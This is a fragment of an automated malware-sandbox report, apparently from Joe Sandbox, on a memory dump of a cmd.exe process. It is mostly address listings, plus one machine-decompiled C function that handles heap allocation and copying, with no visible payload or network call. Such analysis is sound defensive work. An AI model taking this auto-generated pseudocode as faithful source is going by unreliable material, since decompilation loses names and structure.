                                                                                                                                          0x03bed686
                                                                                                                                          0x03bed8ce
                                                                                                                                          0x03bed8d4
                                                                                                                                          0x03bed8dd
                                                                                                                                          0x03bed8e0
                                                                                                                                          0x03bed68c
                                                                                                                                          0x03bed691
                                                                                                                                          0x03bed69d
                                                                                                                                          0x03bed6a2
                                                                                                                                          0x03bed6a7
                                                                                                                                          0x03bed6b0
                                                                                                                                          0x03bed6b5
                                                                                                                                          0x03bed6e0
                                                                                                                                          0x03bed6b7
                                                                                                                                          0x03bed6b7
                                                                                                                                          0x03bed6b9
                                                                                                                                          0x03bed6b9
                                                                                                                                          0x03bed6bb
                                                                                                                                          0x03bed6bd
                                                                                                                                          0x03bed6ce
                                                                                                                                          0x03bed6d0
                                                                                                                                          0x03bed6d2
                                                                                                                                          0x03c3b363
                                                                                                                                          0x03c3b365
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b36b
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b36b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed6bf
                                                                                                                                          0x03bed6bf
                                                                                                                                          0x03bed6e5
                                                                                                                                          0x03bed6e7
                                                                                                                                          0x03bed6e9
                                                                                                                                          0x03bed6ec
                                                                                                                                          0x03bed6ec
                                                                                                                                          0x03bed6ef
                                                                                                                                          0x03bed6f5
                                                                                                                                          0x03bed6f9
                                                                                                                                          0x03bed6fb
                                                                                                                                          0x03bed6fd
                                                                                                                                          0x03bed701
                                                                                                                                          0x03bed703
                                                                                                                                          0x03bed70a
                                                                                                                                          0x03bed70a
                                                                                                                                          0x03bed701
                                                                                                                                          0x03bed710
                                                                                                                                          0x03bed710
                                                                                                                                          0x03bed6c1
                                                                                                                                          0x03bed6c1
                                                                                                                                          0x03bed6c6
                                                                                                                                          0x03c3b36d
                                                                                                                                          0x03c3b36f
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b375
                                                                                                                                          0x03c3b375
                                                                                                                                          0x03c3b375
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b375
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed6cc
                                                                                                                                          0x03bed6d8
                                                                                                                                          0x03bed6d8
                                                                                                                                          0x03bed6d8
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed6c6
                                                                                                                                          0x03bed6bf
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed6da
                                                                                                                                          0x03bed6da
                                                                                                                                          0x03bed716
                                                                                                                                          0x03bed71b
                                                                                                                                          0x03bed720
                                                                                                                                          0x03bed726
                                                                                                                                          0x03bed726
                                                                                                                                          0x03bed72d
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed733
                                                                                                                                          0x03bed739
                                                                                                                                          0x03bed742
                                                                                                                                          0x03bed750
                                                                                                                                          0x03bed758
                                                                                                                                          0x03bed764
                                                                                                                                          0x03bed776
                                                                                                                                          0x03bed77a
                                                                                                                                          0x03bed783
                                                                                                                                          0x03bed928
                                                                                                                                          0x03bed92c
                                                                                                                                          0x03bed93d
                                                                                                                                          0x03bed944
                                                                                                                                          0x03bed94f
                                                                                                                                          0x03bed954
                                                                                                                                          0x03bed956
                                                                                                                                          0x03bed95f
                                                                                                                                          0x03bed961
                                                                                                                                          0x03bed973
                                                                                                                                          0x03bed973
                                                                                                                                          0x03bed956
                                                                                                                                          0x03bed944
                                                                                                                                          0x03bed92c
                                                                                                                                          0x03bed78b
                                                                                                                                          0x03c3b394
                                                                                                                                          0x03bed791
                                                                                                                                          0x03bed798
                                                                                                                                          0x03c3b3a3
                                                                                                                                          0x03c3b3bb
                                                                                                                                          0x03c3b3bb
                                                                                                                                          0x03bed7a5
                                                                                                                                          0x03bed866
                                                                                                                                          0x03bed870
                                                                                                                                          0x03bed892
                                                                                                                                          0x03bed898
                                                                                                                                          0x03bed89e
                                                                                                                                          0x03bed8a0
                                                                                                                                          0x03bed8a6
                                                                                                                                          0x03bed8ac
                                                                                                                                          0x03bed8ae
                                                                                                                                          0x03bed8b4
                                                                                                                                          0x03bed8b4
                                                                                                                                          0x03bed8ae
                                                                                                                                          0x03bed7a5
                                                                                                                                          0x03bed78b
                                                                                                                                          0x03bed7b1
                                                                                                                                          0x03c3b3c5
                                                                                                                                          0x03c3b3c5
                                                                                                                                          0x03bed7c3
                                                                                                                                          0x03bed7ca
                                                                                                                                          0x03bed7e5
                                                                                                                                          0x03bed7eb
                                                                                                                                          0x03bed8eb
                                                                                                                                          0x03bed8ed
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed8f3
                                                                                                                                          0x03bed8f3
                                                                                                                                          0x03bed8f3
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed8ed
                                                                                                                                          0x03bed7cc
                                                                                                                                          0x03bed7cc
                                                                                                                                          0x03bed7d2
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed7d4
                                                                                                                                          0x03bed7d4
                                                                                                                                          0x03bed7d7
                                                                                                                                          0x03bed7df
                                                                                                                                          0x03c3b3d4
                                                                                                                                          0x03c3b3d9
                                                                                                                                          0x03c3b3dc
                                                                                                                                          0x03c3b3dc
                                                                                                                                          0x03c3b3df
                                                                                                                                          0x03c3b3e2
                                                                                                                                          0x03c3b468
                                                                                                                                          0x03c3b46d
                                                                                                                                          0x03c3b46f
                                                                                                                                          0x03c3b46f
                                                                                                                                          0x03c3b475
                                                                                                                                          0x03bed8f8
                                                                                                                                          0x03bed8f9
                                                                                                                                          0x03bed8fd
                                                                                                                                          0x03c3b3e8
                                                                                                                                          0x03c3b3e8
                                                                                                                                          0x03c3b3eb
                                                                                                                                          0x03c3b3ed
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b3ef
                                                                                                                                          0x03c3b3ef
                                                                                                                                          0x03c3b3f1
                                                                                                                                          0x03c3b3f4
                                                                                                                                          0x03c3b3fe
                                                                                                                                          0x03c3b404
                                                                                                                                          0x03c3b409
                                                                                                                                          0x03c3b40e
                                                                                                                                          0x03c3b410
                                                                                                                                          0x03c3b410
                                                                                                                                          0x03c3b414
                                                                                                                                          0x03c3b414
                                                                                                                                          0x03c3b41b
                                                                                                                                          0x03c3b420
                                                                                                                                          0x03c3b423
                                                                                                                                          0x03c3b425
                                                                                                                                          0x03c3b427
                                                                                                                                          0x03c3b42a
                                                                                                                                          0x03c3b42d
                                                                                                                                          0x03c3b42d
                                                                                                                                          0x03c3b42a
                                                                                                                                          0x03c3b432
                                                                                                                                          0x03c3b436
                                                                                                                                          0x03c3b438
                                                                                                                                          0x03c3b43b
                                                                                                                                          0x03c3b43b
                                                                                                                                          0x03c3b449
                                                                                                                                          0x03c3b44e
                                                                                                                                          0x03c3b454
                                                                                                                                          0x03c3b458
                                                                                                                                          0x03c3b458
                                                                                                                                          0x03c3b45d
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b45d
                                                                                                                                          0x03c3b3ed
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed7df
                                                                                                                                          0x03bed7d2
                                                                                                                                          0x03bed7ca
                                                                                                                                          0x03c3b37c
                                                                                                                                          0x03c3b37e
                                                                                                                                          0x03c3b385
                                                                                                                                          0x03c3b38a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b38a
                                                                                                                                          0x03bed742
                                                                                                                                          0x03bed7f1
                                                                                                                                          0x03bed7f8
                                                                                                                                          0x03c3b49b
                                                                                                                                          0x03c3b49b
                                                                                                                                          0x03bed800
                                                                                                                                          0x03bed837
                                                                                                                                          0x03bed843
                                                                                                                                          0x03bed845
                                                                                                                                          0x03bed847
                                                                                                                                          0x03bed84a
                                                                                                                                          0x03bed84b
                                                                                                                                          0x03bed84e
                                                                                                                                          0x03bed857
                                                                                                                                          0x03bed818
                                                                                                                                          0x03bed824
                                                                                                                                          0x03bed831
                                                                                                                                          0x03c3b4a5
                                                                                                                                          0x03c3b4ab
                                                                                                                                          0x03c3b4b3
                                                                                                                                          0x03c3b4b8
                                                                                                                                          0x03c3b4bb
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b4c1
                                                                                                                                          0x03c3b4c1
                                                                                                                                          0x03c3b4c8
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b4ce
                                                                                                                                          0x03c3b4d4
                                                                                                                                          0x03c3b4e1
                                                                                                                                          0x03c3b4e3
                                                                                                                                          0x03c3b4e5
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b4eb
                                                                                                                                          0x03c3b4f0
                                                                                                                                          0x03c3b4f2
                                                                                                                                          0x03bedac9
                                                                                                                                          0x03bedacc
                                                                                                                                          0x03bedacf
                                                                                                                                          0x03bedad1
                                                                                                                                          0x03bedd78
                                                                                                                                          0x03bedd78
                                                                                                                                          0x03bedcf2
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedad7
                                                                                                                                          0x03bedad9
                                                                                                                                          0x03bedadb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedae1
                                                                                                                                          0x03bedae1
                                                                                                                                          0x03bedae4
                                                                                                                                          0x03bedae6
                                                                                                                                          0x03c3b4f9
                                                                                                                                          0x03c3b4f9
                                                                                                                                          0x03c3b500
                                                                                                                                          0x03bedaec
                                                                                                                                          0x03bedaec
                                                                                                                                          0x03bedaf5
                                                                                                                                          0x03bedaf8
                                                                                                                                          0x03bedafb
                                                                                                                                          0x03bedb03
                                                                                                                                          0x03bedb11
                                                                                                                                          0x03bedb16
                                                                                                                                          0x03bedb19
                                                                                                                                          0x03bedb1b
                                                                                                                                          0x03c3b52c
                                                                                                                                          0x03c3b531
                                                                                                                                          0x03c3b534
                                                                                                                                          0x03bedb21
                                                                                                                                          0x03bedb21
                                                                                                                                          0x03bedb24
                                                                                                                                          0x03bedcd9
                                                                                                                                          0x03bedce2
                                                                                                                                          0x03bedce5
                                                                                                                                          0x03bedd6a
                                                                                                                                          0x03bedd6d
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedd73
                                                                                                                                          0x03c3b51a
                                                                                                                                          0x03c3b51c
                                                                                                                                          0x03c3b51f
                                                                                                                                          0x03c3b524
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b524
                                                                                                                                          0x03bedce7
                                                                                                                                          0x03bedce7
                                                                                                                                          0x03bedce7
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedce7
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedb2a
                                                                                                                                          0x03bedb2c
                                                                                                                                          0x03bedb31
                                                                                                                                          0x03bedb33
                                                                                                                                          0x03bedb36
                                                                                                                                          0x03bedb39
                                                                                                                                          0x03bedb3b
                                                                                                                                          0x03bedb66
                                                                                                                                          0x03bedb66
                                                                                                                                          0x03bedb3d
                                                                                                                                          0x03bedb3d
                                                                                                                                          0x03bedb3e
                                                                                                                                          0x03bedb46
                                                                                                                                          0x03bedb47
                                                                                                                                          0x03bedb49
                                                                                                                                          0x03bedb4c
                                                                                                                                          0x03bedb53
                                                                                                                                          0x03bedb55
                                                                                                                                          0x03bedb58
                                                                                                                                          0x03bedb5a
                                                                                                                                          0x03c3b50a
                                                                                                                                          0x03c3b50f
                                                                                                                                          0x03c3b512
                                                                                                                                          0x03bedb60
                                                                                                                                          0x03bedb60
                                                                                                                                          0x03bedb63
                                                                                                                                          0x03bedb63
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedb63
                                                                                                                                          0x03bedb5a
                                                                                                                                          0x03bedb3b
                                                                                                                                          0x03bedb24
                                                                                                                                          0x03bedb69
                                                                                                                                          0x03bedb69
                                                                                                                                          0x03bedb6c
                                                                                                                                          0x03bedb6f
                                                                                                                                          0x03bedb74
                                                                                                                                          0x03c3b557
                                                                                                                                          0x03c3b557
                                                                                                                                          0x03c3b55e
                                                                                                                                          0x03bedb7a
                                                                                                                                          0x03bedb7c
                                                                                                                                          0x03bedb7f
                                                                                                                                          0x03bedb82
                                                                                                                                          0x03bedb85
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedb8b
                                                                                                                                          0x03bedb8b
                                                                                                                                          0x03bedb8d
                                                                                                                                          0x03bedb9b
                                                                                                                                          0x03bedb9b
                                                                                                                                          0x03bedb9d
                                                                                                                                          0x03bedba0
                                                                                                                                          0x03bedba2
                                                                                                                                          0x03bedba4
                                                                                                                                          0x03bedba7
                                                                                                                                          0x03bedba9
                                                                                                                                          0x03bedbae
                                                                                                                                          0x03bedbae
                                                                                                                                          0x03bedbb1
                                                                                                                                          0x03bedbb4
                                                                                                                                          0x03bedbb4
                                                                                                                                          0x03bedbb7
                                                                                                                                          0x03bedbba
                                                                                                                                          0x03bedcd2
                                                                                                                                          0x03bedcd4
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedbc0
                                                                                                                                          0x03bedbc0
                                                                                                                                          0x03bedbd2
                                                                                                                                          0x03bedbd7
                                                                                                                                          0x03bedbda
                                                                                                                                          0x03bedbdd
                                                                                                                                          0x03bedbdf
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedbe5
                                                                                                                                          0x03bedbe5
                                                                                                                                          0x03bedbee
                                                                                                                                          0x03bedbf1
                                                                                                                                          0x03c3b541
                                                                                                                                          0x03c3b544
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b546
                                                                                                                                          0x03c3b546
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b546
                                                                                                                                          0x03bedbf7
                                                                                                                                          0x03bedbf7
                                                                                                                                          0x03bedbfd
                                                                                                                                          0x03bedbfd
                                                                                                                                          0x03bedbff
                                                                                                                                          0x03bedc0b
                                                                                                                                          0x03bedc15
                                                                                                                                          0x03bedc1b
                                                                                                                                          0x03bedc1d
                                                                                                                                          0x03bedc21
                                                                                                                                          0x03bedc21
                                                                                                                                          0x03bedc23
                                                                                                                                          0x03bedc23
                                                                                                                                          0x03bedc26
                                                                                                                                          0x03bedc29
                                                                                                                                          0x03bedc2b
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedc31
                                                                                                                                          0x03bedc34
                                                                                                                                          0x03bedc36
                                                                                                                                          0x03bedcbf
                                                                                                                                          0x03bedcbf
                                                                                                                                          0x03bedcc2
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedc3c
                                                                                                                                          0x03bedc41
                                                                                                                                          0x03bedc43
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedc45
                                                                                                                                          0x03bedc45
                                                                                                                                          0x03bedc47
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedc4d
                                                                                                                                          0x03bedc4d
                                                                                                                                          0x03bedc50
                                                                                                                                          0x03bedc52
                                                                                                                                          0x03bedc55
                                                                                                                                          0x03bedcfa
                                                                                                                                          0x03bedcfe
                                                                                                                                          0x03bedd08
                                                                                                                                          0x03bedd0a
                                                                                                                                          0x03bedd0c
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedd12
                                                                                                                                          0x03bedd15
                                                                                                                                          0x03bedd2d
                                                                                                                                          0x03bedd2f
                                                                                                                                          0x03bedd32
                                                                                                                                          0x03bedd35
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedd35
                                                                                                                                          0x03bedc5b
                                                                                                                                          0x03bedc5b
                                                                                                                                          0x03bedc5e
                                                                                                                                          0x03bedc61
                                                                                                                                          0x03bedc64
                                                                                                                                          0x03bedc67
                                                                                                                                          0x03bedc67
                                                                                                                                          0x03bedc6a
                                                                                                                                          0x03bedc6c
                                                                                                                                          0x03bedc8e
                                                                                                                                          0x03bedc8e
                                                                                                                                          0x03bedc91
                                                                                                                                          0x03bedc93
                                                                                                                                          0x03bedcce
                                                                                                                                          0x03bedcce
                                                                                                                                          0x03bedc95
                                                                                                                                          0x03bedc9c
                                                                                                                                          0x03bedc6e
                                                                                                                                          0x03bedc72
                                                                                                                                          0x03bedc75
                                                                                                                                          0x03bedc77
                                                                                                                                          0x03bedc79
                                                                                                                                          0x03c3b551
                                                                                                                                          0x03c3b551
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedc7f
                                                                                                                                          0x03bedc7f
                                                                                                                                          0x03bedc81
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedc83
                                                                                                                                          0x03bedc86
                                                                                                                                          0x03bedc88
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedc88
                                                                                                                                          0x03bedc81
                                                                                                                                          0x03bedc79
                                                                                                                                          0x03bedc6c
                                                                                                                                          0x03bedc55
                                                                                                                                          0x03bedc47
                                                                                                                                          0x03bedc43
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedc36
                                                                                                                                          0x03bedc23
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedbff
                                                                                                                                          0x03bedbf1
                                                                                                                                          0x03bedbdf
                                                                                                                                          0x03bedb8f
                                                                                                                                          0x03bedb92
                                                                                                                                          0x03bedb95
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bedb95
                                                                                                                                          0x03bedb8d
                                                                                                                                          0x03bedb85
                                                                                                                                          0x03bedb74
                                                                                                                                          0x03bedc9f
                                                                                                                                          0x03bedca2
                                                                                                                                          0x03bedcb0
                                                                                                                                          0x03bedcb0
                                                                                                                                          0x03bedad1
                                                                                                                                          0x03c3b4e5
                                                                                                                                          0x03c3b4c8
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed831
                                                                                                                                          0x00000000
                                                                                                                                          0x03bed800
                                                                                                                                          0x03c3b47f
                                                                                                                                          0x03c3b485
                                                                                                                                          0x00000000
                                                                                                                                          0x03c3b485
                                                                                                                                          0x03bed665
                                                                                                                                          0x03bed652
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a915e992bd3aef5908ae0f6d12dc98b336d34ea8d1a87b0e270aea9c7f7ca94a
                                                                                                                                          • Instruction ID: e3619521a46189c8ab9aef934482645aca65344e33ae7bf8231f15e5040ee99f
                                                                                                                                          • Opcode Fuzzy Hash: a915e992bd3aef5908ae0f6d12dc98b336d34ea8d1a87b0e270aea9c7f7ca94a
                                                                                                                                          • Instruction Fuzzy Hash: 41E1A034A003598FDB24DF18C990BA9B7B5FF46308F0941EDD909DB291DBB4AE81DB52
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BE849B Relevance: .3, Instructions: 290COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                          			E03BE849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x3caf9c0);
				E03C2D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x3cc7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E03BECEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03BF2280( *[fs:0x30], 0x3cc8550);
						_t139 =  *0x3cc7b04; // 0x2
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E03C0F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E03BEFFB0(_t193, _t235, 0x3cc8550);
								L5:
								return E03C2D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E03BD1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x3cc7b9c; // 0x0
							_t235 = L03BF4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x3cc7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E03C0A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E03BEFFB0(_t193, _t235, 0x3cc8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L03BF77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L03BF77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x3cc7b04; // 0x2
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x3cc7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E03C137C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x3cc7b9c; // 0x0
									_t214 = L03BF4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E03C137F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x3cc7b10 =  *0x3cc7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x3cc7b04 =  *0x3cc7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L03BF77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L03BF77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x3cc7b08 =  *0x3cc7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E03C157C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E03C1F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L03BF77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E03C0A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L03BF77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E03C196C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                                                                          0x03be849b
                                                                                                                                          0x03be849b
                                                                                                                                          0x03be849b
                                                                                                                                          0x03be849b
                                                                                                                                          0x03be849d
                                                                                                                                          0x03be84a2
                                                                                                                                          0x03be84a7
                                                                                                                                          0x03be84b1
                                                                                                                                          0x03be84d8
                                                                                                                                          0x00000000
                                                                                                                                          0x03be84b3
                                                                                                                                          0x03be84c4
                                                                                                                                          0x03be84c9
                                                                                                                                          0x03be84cd
                                                                                                                                          0x03be84cf
                                                                                                                                          0x03be84cf
                                                                                                                                          0x03be84d6
                                                                                                                                          0x03be84e6
                                                                                                                                          0x03be84e9
                                                                                                                                          0x03be84ec
                                                                                                                                          0x03be84ef
                                                                                                                                          0x03be84f2
                                                                                                                                          0x03be84f4
                                                                                                                                          0x03be84fc
                                                                                                                                          0x03be8501
                                                                                                                                          0x03be8506
                                                                                                                                          0x03be8509
                                                                                                                                          0x03be86e0
                                                                                                                                          0x03be86e5
                                                                                                                                          0x03be86e8
                                                                                                                                          0x03be86ed
                                                                                                                                          0x03be86f0
                                                                                                                                          0x03be86f2
                                                                                                                                          0x03c39afd
                                                                                                                                          0x03c39b02
                                                                                                                                          0x03be84da
                                                                                                                                          0x03be84df
                                                                                                                                          0x03be84df
                                                                                                                                          0x03be86fa
                                                                                                                                          0x03be86fd
                                                                                                                                          0x03be86fe
                                                                                                                                          0x03be8701
